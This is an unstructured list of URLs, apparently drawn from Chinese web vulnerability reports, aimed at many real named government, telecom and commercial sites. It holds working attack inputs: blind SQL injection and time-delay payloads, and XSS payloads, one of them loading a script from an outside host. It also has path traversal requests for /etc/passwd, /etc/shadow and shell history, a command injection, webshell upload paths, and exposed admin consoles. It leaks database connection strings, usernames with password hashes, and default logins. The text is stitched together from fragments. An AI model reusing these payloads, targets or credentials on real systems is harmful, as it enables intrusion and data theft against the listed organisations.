http://china-qitc.sgepri.sgcc.com.cn/WaiShi.Aspx?item=0&txt= http://china-qitc.sgepri.sgcc.com.cn/WaiShi.Aspx?item=0&txt=1 http://www.ahecs.gov.cn/plus/ http://www.ahecs.gov.cn/data/ http://www.qfkd.com.cn/ http://mediarank.sootoo.com/index.php/index/web_info/id/3 http://mediarank.sootoo.com/index.php/index/web_info?id=3 http://www.gpslh.com/ http://survey.game.renren.com/index.php?sid=33514 http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,1,1%29%29=108,benchmark%20%28100000000,md5%281%29%29,1%29=1 http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28user%28%29,2,1%29%29=111,benchmark http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,3,1%29%29=109,benchmark%20%28100000000,md5%281%29%29,1%29=1//m http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,4,1%29%29=101,benchmark%20%28100000000,md5%281%29%29,1%29=1//e http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,5,1%29%29=115,benchmark%20%28100000000,md5%281%29%29,1%29=1//s http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,6,1%29%29=117,benchmark%20%20%20%28100000000,md5%281%29%29,1%29=1//u http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,7,1%29%29=114,benchmark%20%20%20%28100000000,md5%281%29%29,1%29=1//r http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,8,1%29%29=118,benchmark%20%20%20%28100000000,md5%281%29%29,1%29=1//v http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,9,1%29%29=101,benchmark%20%20%20%28100000000,md5%281%29%29,1%29=1//e http://survey.game.renren.com/index.php?sid=33514%20and%20if%28ascii%28substring%28database%28%29,10,1%29%29=121,benchmark%20%20%20%28100000000,md5%281%29%29,1%29=1 http://218.94.1.166/show.aspx http://218.94.1.166/TimeSupervise.aspx?deptId=1 http://www.imaidan.com/topic/id-7450 http://58.213.19.150/123.jsp www.fardior.com,貌似打不开了已经。site:www.fardior.com WTUXmfO1:15775:0:180:7 http://58.213.19.5/info.php http://www.jnjj.com/jnjjwebnew/default.aspx http://www.jnjj.com/jnjjwebnew/Member/MemberDetailInfo.aspx?type=modify&id= http://61.145.73.214/index.asp http://211.138.211.130/ http://member.aili.com/?c=member&m=headImage&a=show http://luc.pw/ http://iask.sina.com.cn/search_engine/search_knowledge_engine.php?title=%2F%2F&key=%2F%2F&classid=0&gjss=0&vl=2&type=0&tag=0 http://www.pceggs.com/prize/chargeuserlist.aspx?issue=tfx-h0462%22/%3E%3Cscript%3Ealert%28%27www.anying.org%27%29%3C/script%3E http://www.pceggs.com/prize/prizebbs.aspx?issue=tfx-h0462%22/%3E%3Cscript%3Ealert%28%27www.anying.org%27%29%3C/script%3E http://www.pceggs.com/duobao/duobao_index.aspx?id=10001691%22/%3E%3Cscript%3Ealert%28%27www.anying.org%27%29%3C/script%3E http://www.pceggs.com/duobao/duobao_index.aspx?id=10001691%22/%3E%3Cscript%20src=http://x.co/16GzJ%3E%3C/script%3E ugc.renren.com/?author=1得到管理员用户名ugc-admin http://supplier.gome.com.cn/collectionOnDelivery/collectionOnDelivery_cashDailyMain.do http://www.chinaopenschool.com/gome/customize/nwc_user_cloud/login/login.html http://www3.zte.com.cn/datachange/file_upload.jsp?SelfControl=1&ShowText=1&AllowExt=rar,zip&InputName=&BgColor= http://www2.zte.com.cn/datachange/file_upload.jsp?SelfControl=1&ShowText=1&AllowExt=rar,zip&InputName=&BgColor= http://k.autohome.com.cn/form/carinput/edit/185651 http://i.autohome.com.cn/ajax/relations/addfollower?fuid=7905255 http://i.service.autohome.com.cn/clubapp/Message/SendMessage?txtName=nocar_guy&txtContent=test&ReturnType=3 http://3g.sina.com.cn/prog/wapsite/college/college.php?id=70162 3g.happigo.com/yijian.php m.happigo.com/user/myword.php http://m.happigo.com/help.php?search_key=&pno=2&uid=1286052&acckey=eQeFTlnkKzn91nqPAX15aSnOAf5xOwxf www.urlshare.cn等中间页面对某些可信域名是不做检查而做直接跳转的 http://b.wap.soso.com/qzone/detail.jsp?url=http%3A%2F%2Flvwei.me%2Fh%2fqs.php http://z.qq.com/?sid=盗来的sid http://wap.cmread.com/ http://wap.cmread.com/sso/oauth2/smsResetPwd?txId=64xxxxxxxxxxxxxxxxxxxx&msisdn=xxxxxxxxxxx m.happigo.com/user/login.php http://m.happigo.com/user/checkcode.php?code_id=16059 coding:utf-8-*- http://pkucio.baidu.com http://bolt.jebe.renren.com/bolt/member/city.htm?provinceCode=0086150000000000%27%20and%20if%28%281=2%29,1,%28select%201%20from%20mysql.user%29%29%20and%20%27%27=%27 http://bolt.jebe.renren.com/evol/campaign/getCampaignList.htm http://sop.suning.com/mer/member/pwdReset.htm http://www.super8.com.cn/mem/DeleteOrder.aspx?accid=56389006 http://ajax.club.autohome.com.cn/NewPost/Post?bbs=c&bbsId=2615&urlbbsId=2615&pvareaid=101465 http://ajax.club.autohome.com.cn/Post/TopicPost?topicid=0&tbbs=c&tbbsid=2615&urlbbsid=2615&fake_bbsid=0&tTitle=H2%2C%B4%F3%BC%D2%B6%BC%C0%B4%CB%B5%CB%B5%C4%DC%B5%C8%B4%FD%B5%C4%BC%AB%CF%DE%CA%B1%BC%E4%CA%C7%B6%E0%BE%C3&tRequestSource=AutohomeClub&log_id=&ATopicContent=%CE%D2%D5%E2%D1%F9%B5%C4%8C%C5%CB%BF%CF%D6%D4%DA%CE%DE%B4%E6%BF%EE%A3%AC%BB%B9%D3%D0%B7%BF%B4%FB%A3%AC%CB%F9%D2%D4%C4%DC%B9%BB%B5%C8%B4%FD%A3%AC%B2%BB%D6%AA%B5%C0%B4%F3%BC%D2%CA%C7%D4%F5%C3%B4%CF%EB%B5%C4%A3%AC%C0%B4%CB%B5%CB%B5%B0%C9%A3%A1%3Cimg+class%3D%22spic%22+src%3D%22http%3A%2F%2Fx.autoimg.cn%2Fclub%2FPost%2Fimg%2Fsmiles%2F43.gif%22%3E&tNotify=1 http://ajax.club.autohome.com.cn/Post/TopicPost?topicid=0&tbbs=c&tbbsid=2615&urlbbsid=2615&fake_bbsid=0 http://maillist.chinabyte.com/mail/login.jsp http://weblive.yesky.com/ http://admin.tianjimedia.com/jsp/system/index.jsp http://admin.tianjimedia.com/jsp/system/list.jsp http://admin.tianjimedia.com/jsp/system/input.jsp http://www.super8.com.cn/act/default.aspx?act=qunar http://www.966915.com/plugins/index.php?q=imgurl&url=QGltZ3VybEAvY29yZS9jb21tb24uaW5jLnBocA== www.966915.com?admin http://www.csxblyey.com/adminer.php http://club.sina.com.cn http://www.sgit.sgcc.com.cn/statistics/pma/index.php http://www.nvidia.cn/content/apac/employment/cn/job_mssql_cn.php http://125.93.53.13/UploadFile/thumb_6_6_.Php.JPG%20%20%20%20%20%20%20%20%20%20Php http://www.cuba.com.cn/htmain/index.php http://www.cuba.com.cn/cuba.rar http://www.hhsports.com.cn/plinfo.php http://www.super8.com.cn/act/Evip.aspx?act=sohuweibo http://yeyou.sdo.com/login.html admin:admin http://cu.17k.com/login.action http://plrg.nuaa.edu.cn http://idc.263.net/263/index.php?c=14 http://idc.263.net/263/admin/login.php http://idc.263.net/263/index.php?c=14 http://frt.7daysinn.cn:7700/TillSearch.aspx?BusinessDateStart=2013-7-1&BusinessDateEnd=2013-7-3&HotelID=1&HotelName=乌云店&UserID=84864&UserName=专业种田&WorkShiftID=0&WorkShiftTitle=乌云 http://inner.7daysinn.cn/BusinessRpt/ReportHelp.aspx?trackId=4b2fd8ed-221d-4483-8cc6-fa536f840a09 http://inner.7daysinn.cn/BusinessRpt/ReportHelp.aspx?trackId=4b2fd8ed-221d-4483-8cc6-fa536f840a09 http://zgqxbk.zqgame.com/Main/ListPage.aspx?type=news http://zgqx.zqgame.com/Main/Tutorial.aspx?type=actmess https://iaas.zqgame.com/ http://ty.zqgame.com/login.aspx http://kf.zqgame.com/admin/adminLogin.do http://www.changanfordclub.com/index.action http://login.sina.com.cn/cgi/login/logout.php,然后点击添加(需要抓包小小的改动一下,否则发不了文章) http://www.eastday.com/东方网新闻投稿 http://m.ctrip.com是针对用户用手机访问的,账号密码输入次数过多也不会锁定账号或者出现验证码。 https://ecp.sgcc.com.cn/BidUpgrade/SgccRecyclersModify?next=2 DATA:password=12345678&loginName=12345678 http://mgmt.motel168.com/ https://www.cmpassport.com/umc/reg/upgrade http://www.ccom.gov.cn/index.action www.super8.com.cn/B090/SpecialZoneList.aspx?city=1037&oid=591&sdate=1 http://cms.93.gov.cn:9091/app/vote/vote_form1_statistics.jsp?id=2070602421853087421 http://222.73.164.12:8081/jmx-console/ http://meishi.suning.com URL:http://59.cn/webhost/ajax.asp DATA:act=database&db=1&ptype= DATA2:act=webhost&host= http://sh.esf.sina.com.cn/uc_v1.php?id=editwantrent&bid=318 http://big5.mep.gov.cn/gate/big5/www.sepacec.com/apps/sepacec-tx/kind_search.php,点进去一看,直接显示源文件,如图所示 http://big5.mep.gov.cn/gate/big5/www.sepacec.com/apps/sepacec-tx/db.php,猜猜看有什么 http://qq.8090.com/QQGroupInfo.aspx?id=14981,可入后台。 http://www.motel168.com/ShowHotelImage.aspx?type=1 http://company.zqgame.com/admin/index.html http://job.zqgame.com/admin/default.aspx http://en.zqgame.com/1.php http://beta.motel168.com/partner_info.html?proId=1 http://ch.smartdevices.com.cn/ http://idns.sfn.cn/viplogin/vipdomain_regDns.do http://idns.sfn.cn/system.jsp http://passport.blogbus.com/login_form?goto=http%3A%2F%2Fpassport.blogbus.com%2Fusers%2F http://www.ahwt.com.cn/ http://rr.mep.gov.cn/rsmsreq/ http://211.138.195.164/ http://i.pop.xdf.cn/zhuanti/13/zw/reg/wzdetail.asp?id=2 http://i.pop.xdf.cn/zhuanti/13/zw/reg/index.asp http://www.softto.com.cn/about.php?cid=1&id=10 http://qzone-music.qq.com/fcg-bin/fcg_music_fav_getinfo.fcg?dirinfo=1&dirid=201&uin=QQ号码&p=0.887586027616635&inCharset=GB2312&outCharset=utf-32&hostUin=¬ice=0&needNewCode=0&format=jsonp&platform=musicbox&jsonpCallback=jsonCallback http://cs.locojoy.com/ http://www.tudou.com/error.php?msg={xss http://try.women.sohu.com http://try.women.sohu.com/user/edit/24418 http://218.26.163.72/login.jsp http://121.35.251.51:80/zl/zmm.asp?button=%E6%8F%90%20%E4%BA%A4&button3=%E6%B8%85%20%E7%A9%BA&button21=%E8%BF%94%E5%9B%9E%E7%99%BB%E9%99%86&zmmzh=88888 http://b2b.airchn.com ftp://61.178.109.106/ http://www.midlele.com/forum/index.asp http://www.nyzw.gov.cn/common/common_info.action?wid=201110181532321003 http://www.sxrsj.gov.cn/admin/login.asp http://www.czjt.gov.cn/sofpro/gecs/questionnaire/web_list_yigediaocha.jsp?questionnaire_id=9 http://www.hnma.org.cn/hnma.rar http://oa.ztky.com/login.aspx?ReturnUrl=%2fuserNameLogin.aspx http://www.chekucafe.com/info.php http://brand.ellechina.com/index.php?cp=comments&eid=67&id=9388 http://makeup.ellechina.com/index.php?cp=searchlist&cid=1&bid=48 http://zyjd.post.gov.cn/scorequery/beforequery.jsp http://zyjd.post.gov.cn/scorequery/scoreaction!queryscore.action http://i.autohome.com.cn/i8001685 http://search.customs.gov.cn/dig/advsearch.action http://benpen.hualvtu.com/light.action?id=10130401191700002316 http://www.aqshbx.gov.cn/news.php?action=show&id=1672 http://www.aqshbx.gov.cn/news.php?action=show&id=1672 http://www.aqshbx.gov.cn/login.php http://xedkbm.smehen.gov.cn/111.rar http://gcjs.hnjs.gov.cn/ http://gcjs.hnjs.gov.cn/FCKeditor/editor/fckeditor.html http://dengfeng.hnjs.gov.cn/FCKeditor/editor/fckeditor.html http://gcjs.hnjs.gov.cn/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=connectors/aspx/connector.aspx http://www.hntxxh.cn/grsq.php http://my.ku6.com/ http://boke3.ku6.com/phpmyadmin/index.php http://giftour.ku6.com/test.php http://share.weiyun.com/49e7980c6e88e08a51c8ec8b98bfe197 view-source:http://share.weiyun.com/49e7980c6e88e08a51c8ec8b98bfe197 http://www.hntxxh.cn/yydt_show.php?id=44 http://www.hntxxh.cn/admin/ http://zu.soufun.com/rent/backstage/Delegate_Require/Delegate_Personal_Select.aspx http://www.dywlr.gov.cn/word-content_getWordContent.action?contentid=310220&source=showPointer http://220.191.210.54:8787/qlyg/bsdt/Com_register.do http://account.autohome.com.cn/login?backurl=http://www.baidu.com www.baidu.com http://admin.CBiween/backstage/login_framework.html http://58.83.206.138/wordtype/admin/ http://finance.sina.com.hk/cgi-bin/nw/main.cgi?cat=1571 http://updatenew.dedecms.com/base-v57/package/patch-v57&v57sp1-20130607.zip http://album.9you.com/conf/server.xml jdbc:oracle:thin:@192.168.0.229:1521:album jdbc:oracle:thin:@192.168.0.229:1521:gshop jdbc:oracle:thin:@192.168.0.229:1521:gdclandg jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDClan jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDCommon jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://125.211.204.123:29806;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://180.153.120.73:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://125.211.205.70:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://113.105.225.13:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://113.105.225.13:1433;DatabaseName=GOnlineGame http://bbs.9you.com/conf/server.xml jdbc:mysql://60.206.15.40:3306/common?characterEncoding=GBK jdbc:mysql://60.206.15.16:3306/common?characterEncoding=GBK jdbc:mysql://60.206.15.40:3306/forum2?characterEncoding=GBK jdbc:mysql://60.206.15.16:3306/forum2?characterEncoding=GBK jdbc:mysql://60.206.15.40:3306/forum1?characterEncoding=GBK jdbc:mysql://60.206.15.16:3306/forum1?characterEncoding=GBK http://gdclan.9you.com/conf/server.xml jdbc:oracle:thin:@192.168.0.229:1521:album jdbc:oracle:thin:@192.168.0.229:1521:gshop jdbc:oracle:thin:@192.168.0.229:1521:gdclandg jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDClan jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDCommon jdbc:jtds:sqlserver://125.211.204.121:29806;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://125.211.204.123:29806;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://180.153.120.43:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://180.153.120.73:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://125.211.205.56:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://125.211.205.70:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://113.105.225.29:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://113.105.225.13:1433;DatabaseName=GOnlineGame jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDClan;SelectMethod=Cursor jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDCommon jdbc:jtds:sqlserver://113.105.225.12:1433;DatabaseName=GDStoreBilling jdbc:jtds:sqlserver://113.105.225.13:1433;DatabaseName=GOnlineGame http://gdclan.9you.com/admin/login.jsp http://www.gjxfj.gov.cn http://ts.gjxfj.gov.cn/login-do.pfv http://ts.gjxfj.gov.cn/admin/login-do.pfv http://ts.gjxfj.gov.cn/admin/tsbsys.jsp http://ts.gjxfj.gov.cn/common/html/upfile_table.htm Site:ts.gjxfj.gov.cn http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=1daa0067-5ba4-11e1-8e4c-7bfd30aedc22.doc http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../etc/passwd http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../etc/shadow http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../root/.bash_history http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../opt/weblogic/user_projects/domains/jscxwebdomain/WebRoot20130628.tar http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../opt/weblogic/user_projects/domains/jscxcoredomain//platform20130628.tar http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../etc/hosts http://ts.gjxfj.gov.cn/downloadFile.pfv?domain=xffj&path=dfyjs&fileName=../../../../etc/issue http://sq.169ol.com/ http://119.6.119.40/umportal/RegisterWebServlet?method=getUserRegister&portalId=00&LoginSequenceID=26DTIx&goBackUrl=http://t.169ol.com/index_sql169ol_jump.php http://sq.169ol.com/user_tongbu.php?uid=&username=&jump_url=http://sq.169ol.com http://sq.169ol.com/user_tongbu.php?uid=1&username=abc&jump_url=http://sq.169ol.com http://www.film.cn/admin-console/ http://tiyan.baidu.com/index.php?r=user/profile http://xj.vae.ha.cn/ds/xb/bmb_detail.jsp?nr=2853 http://go108.astro.women.sohu.com/wish_tree_inputwish.php http://go108.astro.women.sohu.com/wish_tree_otherswish.php?id=25945 http://act.52pk.com/hd/ylzt9/welcome/get_paim?id=827590 http://act.52pk.com/hd/chinajoy2013/welcome/xs?id=8977775 http://www.unisk.cn/pro/province_order.asp http://www.lyhb.gov.cn/a.rar http://www.lyhb.gov.cn/plus/ http://www.lyhb.gov.cn/webadmin/ http://home.super8.com.cn/FCKeditor/editor/filemanager/browser/default/browser.html?Connector=%2FFCKeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fasp%2Fconnector.asp http://home.super8.com.cn/fckeditor/editor/filemanager/connectors/test.html# http://digital.sina.com.hk/cgi-bin/pricelist/pricelisting.cgi?action=list&type=1&option=1&total=56&page=2 http://www.topunion.com.cn/www.rar http://myphoto.tech.sina.com.cn/ http://myphoto.tech.sina.com.cn/default.php?s=user&a=profile&uid=用户ID http://gongyi.eol.cn/helpdetail.php?id=69 http://huodong.xiaomi.com/microfilm/default/join http://system.greentree.com.cn:8080/op/Module_ERP/FCKeditor/editor/filemanager/browser/default/connectors/test.html# http://system.greentree.com.cn:8080/\op\Module_ERP\joinin\geling.aspx http://w.xdf.cn/user/login.php?uid=8060 http://w.xdf.cn/ http://www.epailive.com/bottomAction_bottom_include.do?fileName=about.jsp http://myportal.super8.com.cn http://myportal.super8.com.cn/hr_admin/Upfile/1e1f1ef1-bd64-443c-846a-6a60b45fd3ff.pdf http://job.super8.com.cn/backend.php/interface/getdoc/?path=../../../../etc/passwd http://www.anta.com/hr/admin/admin_login.php site:fktong.com http://www.fktong.com/user/home.aspx?username=yxf2047&password=cb6a7f67e13987a http://www.fktong.com/user/home.aspx?username=q2861054&password=17edbf2655bf50a http://www.fktong.com/user/userpay.aspx?username=zhangyi&password=ab428a5cc35563e http://www.fktong.com/user/home.aspx?username=zhoulei2013&password=ab428a5cc35563e http://www.fktong.com/user/home.aspx?username=chongpan&password=ab428a5cc35563e http://www.fktong.com/user/home.aspx?username=fangchanmingmai&password=ab428a5cc35563e http://erp.998.com/ http://erp.998.com/web.rar Version:V5.0 http://mba.znufe.edu.cn/AdminManage/FileManagement/FileList.aspx?dir=D:\www.znmba.com\web_new\Upload\HtmlEditor\file\asp.asp http://mba.znufe.edu.cn/2013-7-5.rar http://mba.znufe.edu.cn/2013-1-31.rar http://mba.znufe.edu.cn/upfile.rar http://mba.znufe.edu.cn/Upload/HtmlEditor/file/asp.asp/1.jpg http://mba.znufe.edu.cn/Upload/HtmlEditor/file/asp.asp/1asp.jpg http://mba.znufe.edu.cn/Upload/HtmlEditor/file/asp.asp/asp.gif http://mba.znufe.edu.cn/Upload/HtmlEditor/file/asp.asp/asp.jpg http://mba.znufe.edu.cn//FCKeditor/editor/filemanager/browser/default/browser.html http://www.zkwo.com/ http://www.72z.org/ http://www.zhiweikeji.cn/ http://72z.org/support/s.aspx?p=这个我们加入'测试 http://ufsdp-borrow.ufsoft.com.cn/cmd.asp http://ufsdp-borrow.ufsoft.com.cn/1937cN.txt http://www.ahlib.com/ahlib/addcontent/webEditor/upload/files/file_down.jsp?filename=../../../../../../conf/tomcat-users.xml http://www.ahlib.com/manager/html http://220.181.26.232/stats/id;ls http://ufsdp-zjsj.ufida.com.cn/index.aspx http://ufsdp-zjsj.ufida.com.cn/files/ http://ufsdp-zjsj.ufida.com.cn/files/s.asp;.jpg http://j.esf.sina.com.cn/login/retrievepsd http://211.XX.XX.XXX http://yun.17186.cn/loginbypass.action http://yun.17186.cn/indexAction_index.action http://www.amazon.cn/%E5%AE%9E%E6%88%98%E7%B3%BB%E5%88%97-HTML-5%E4%B8%8ECSS-3%E6%9D%83%E5%A8%81%E6%8C%87%E5%8D%97-%E9%99%86%E5%87%8C%E7%89%9B/dp/product-description/B00BS58ZWQ/ref=dp_proddesc_0?ie=UTF8&s=books http://3g.youku.com/smartphone/login http://112.231.23.30:8080/ http://www.uftong.com/Admin/ManagerTestimony/ftb.image.aspx http://www.joyoland.com/article_cat.php?id=8 http://www.zyhycs.com/ http://www.zyhycs.com/activitiesinfo.jsp?classid=10&id=201306251216560001 http://www.zyhycs.com/background/ http://mep128.mofcom.gov.cn/mep/industry_OA/LOGIN.ASP http://aobo.tcl.com/leftjs.asp?id=42 http://cam.inc.hc360.com/AccessRes/ResourceInput.aspx?checkCode=Hf8f61F77z5xkljOV1DtRpmv7RhSxKGLGi13bVFnL/tPzPWPAoYHoKHrQp4FSeaRtYPcXFx54Paf0E836gsiOB/N%2BWaIFDGuE5pZh%2BWN9%2Bvg3Gy4/4YKRhg7nQE2q2hxgnzTn9uNTfdGznAu2kmDhLnja2LfeXAm3E04N/QAFBc= http://cam.inc.hc360.com/AccessRes/ResourceInput.aspx?checkCode=Hf8f61F77z5EVQlfdni0gqTPbEQcZxle%2fj6HIf6pB7qKly%2f4%2bhG3vLXt9NFbh2U6w8TIKRPD8%2fIcNjjcyOWexIaLWEjU2JA9GAqxz%2b720TFbaEfruuMMeiUCy2PakZ17nc%2b%2bF16qvKdaZWU8yjoC37zd0CZh1lIgydY7RjHiudA%3d http://58.50.254.83:81/plus/mytag_js.php?aid=9090 http://www.chekucafe.com/content_cygs.php?NID=36 http://www.chekucafe.com/content_cyxm.php?NID=103 http://www.chekucafe.com/content_cyxm2.php?NID=125 http://www.chekucafe.com/content_mtbd.php?NID=-1 http://www.chekucafe.com/content_mtbd2.php?NID=-1 http://www.chekucafe.com/check.php data:pwd=1 http://www.fhredcross.org.cn/smsAdmin/index.aspx http://jipiao.suning.com/vgs-web/mobile/oct/modifyTraveller.htm http://jipiao.suning.com/vgs-web/mobile/oct/deleteTraveller.htm http://jipiao.suning.com/vgs-web/mobile/oct/viewTraveller.htm http://jipiao.suning.com/vgs-web/mobile/oct/orderList.htm http://jipiao.suning.com/vgs-web/mobile/oct/orderInfo.htm http://jipiao.suning.com/vgs-web/mobile/oct/cancelOrder.htm http://jiudian.suning.com/hotelpay-web/hotelTerminal/fnd/searchHotelOrders.htm http://www.furong.gov.cn:8000/spweb/serviceOnline/searchinfo.jsp?flownum=0110380000051307050027 http://law.inc.hc360.com/finance/detail.aspx?fund_code=20110408-008 http://m.lefeng.com/index.php/user/login http://www.youc.com/index.php?m=Game&a=server&game_id=22 http://www.youc.com/index.php?m=Game&a=search&nbr=&m=Game&a=search&nbr=88952634 http://map.soso.com/AppBox/print/?t=poi&c={"r":{"searchType":"defSearch","keyword http://baidu.com/ http://lexue.lenovo.com.cn/status http://202.110.193.80:8080/license!getExpireDateOfDays.action http://zone.wooyun.org/content/4912这种情况我们可以手动添加10086作为拦截目标,但是如果是用上千个网站上千个号码进行攻击呢?手动添加肯定是来不及的。更况且不断的短信占用极大系统资源弹窗执行其他操作是很困难的。而关机或者飞行模式只能换取短暂的安宁,因为短信未能发送到手机会暂时停留,待手机能正常通信之后依旧发送到手机。而全部拦截的软件应该是没有,就算有也只有极个别应用商店才会有。 http://203.91.121.133/cacti/graph_view.php?action=tree&tree_id=6&leaf_id=79 http://www.mirapoint.com.cn/products/lanmu.php?id=14 http://g.youc.com/plus/mood_info.php?aid=12157 http://g.youc.com/plus/game/get_body.php?aid=12161 http://g.youc.com/plus/game/get_body.php?aid=12161 http://www.super8.com.cn/Mem/NewGuest.aspx?oid=30817 http://www.gzwst.gov.cn http://www.gzwst.gov.cn/SysHTML/ArticleHTML/12738_1.shtml http://web.sdpost.com.cn/bmfw8626/index.php http://webhelp.sdpost.com.cn/ http://webhelp.sdpost.com.cn/shop/html/?'155.html http://wap.hjsm.tom.com/phpinfo.php http://wap.hjsm.tom.com/js/fckeditor/editor/filemanager/connectors/test.html# site:jiayuan.com http://wapzj.189.cn/v5/getpwd.jsp http://www.jyhotels.com http://zone.wooyun.org/content/4226 http://old.jyinns.com/wyyp.asp?jid=1此处有注入 http://feedback.56.com/ http://www.jawsj.gov.cn/就能发现大量敏感目录和敏感文件,其中比较关键的是后台管理地址为http://www.jawsj.gov.cn/admin/admin_login.asp,以及CMS的数据库文件地址http://www.jawsj.gov.cn/database/SiteWeaver6.5.mdb,相信许多大侠手中的路径库都包含这两条路径。打开后台可以发现是动易的后台,同时从MDB的文件名也可看出是动易后台。 http://www.jadj.com.cn/wh.asp。再比如吉安市永新县政府门户网站,使用了风讯5.0的cms做后台,该版本早已被爆存在SQL注入漏洞,在wooyun搜索也能找到这个漏洞的信息,笔者做过测试,确实能爆库。 http://www.chinadns.com/dns.sql http://www.chinadns.com/plus/download.php http://caipiao.58.com/news/ http://www.gansupost.com/ http://card.gansupost.com/Search.aspx?key=,看图 http://zy.gansupost.com/gszy/hyjj.asp?title=1 http://zy.gansupost.com/gszy/xhzf.asp https://pay.kongfz.com/中http://pay.kongfz.com/remit.do?act=toWriteRemitPage(须用户登录)‘资金管理’-‘填写汇款通知单’中的上传功能中,可以绕过JS过滤,直接上传webshell http://www.super8.com.cn/B090/SpecialZoneList.aspx?city=1011%27%20WAITFOR%20DELAY%20%270:0:1%27--&oid=471&sdate=2013-04-09 http://www.super8.com.cn/B090/SpecialZoneList.aspx?city=1011%27%20WAITFOR%20DELAY%20%270:0:10%27--&oid=471&sdate=2013-04-09 http://www.super8.com.cn/Hotel/HotelDetail.aspx?edate=2013-07-05&oid=557&sdate=2013-07-04&Tag=xxxs%22%3E%3Cimg/src=1%20onerror=alert%282%29%3E%3C http://zc.yundasys.com/ts/user/user_ts_detail.php?tsid=27263 http://fsz.xuyong.gov.cn/dede http://mis.998.com/ http://mis.998.com/Portal/Workflow/Reports/QingXiaoJia.aspx http://mis.998.com http://www.gzjls.net/showart.asp?id=1591 http://www.gzjls.net/downfile.asp?Filename=conn.asp http://www.gzjls.net/downfile.asp?Filename=index.asp www.gzjls.net/Database/24^&78$%$^@.asp http://www.gzjls.net/downfile.asp?Filename=database/database$#%#.asp www.519.com http://service.519.com/User_addresslist.aspx?action=loadmodifyaddress&callback=jsonp1373219130458&addressid=xxx http://service.519.com/User_addresslist.aspx?action=del&callback=jsonp1373220935815&id=xxx cn:8099 http://www.tohot.cn/rdwt/rdwtmain.php?txtid=10 URL:http://partner.etms.360buy.com/OrderDeliveryQuery/PS_QuanChengGenZong.aspx http://club.autohome.com.cn/bbs/thread-c-2123-23666325-1.html http://f.game.tom.com/wenba/my_answer.php?status=1 http://shop.sdcms.cn/user/message.asp http://shop.sdcms.cn/admin_seo/sd_order.asp http://180.153.21.161:49705/ http://180.153.21.162:49705/ http://180.153.21.163:49705/ http://180.153.21.164:49705/#/ http://www.0594hr.com/connect/API/comm/inc.php http://manager.51zhangdan.com:6969/statistics/comment.html http://visitor.lenovo.com.cn/yoga/zhtml4/blackdogllc/ http://61.iyiyun.com/Index/getmap/id/3 http://job.vanke.com/ http://job.vanke.com/xiao.asp http://www.ftchinese.com/ 